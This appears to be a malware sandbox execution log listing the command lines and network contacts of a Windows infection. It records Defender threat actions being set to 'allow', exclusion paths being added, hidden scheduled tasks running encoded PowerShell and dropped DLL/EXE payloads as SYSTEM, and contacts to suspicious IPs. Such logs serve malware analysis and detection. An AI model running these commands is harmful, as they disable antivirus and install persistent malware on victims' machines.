powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gDVVmaqMc" /SC once /ST 01:51:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gDVVmaqMc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gDVVmaqMc"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 01:17:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe\" XT /dEsite_idNZT 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BAnwxolbGpCzXNxkj"

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe XT /dEsite_idNZT 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\AvKHovV.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 12:41:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll\",#1 /LHsite_idkmI 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QhciBzJOokLnyYZub"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.169.89:443 yip.su tcp
US 104.20.4.235:443 pastebin.com tcp
RU 193.233.132.234:80 193.233.132.234 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 skategirls.org udp
US 8.8.8.8:53 grabify.link udp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 77.221.151.32:80 77.221.151.32 tcp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 net.geo.opera.com udp
US 104.26.8.202:443 grabify.link tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.31.124:443 jonathantwo.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 32.151.221.77.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 234.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 202.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 14.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 124.31.21.104.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 api.myip.com udp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.209:80 185.172.128.209 tcp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
US 8.8.8.8:53 209.128.172.185.in-addr.arpa udp
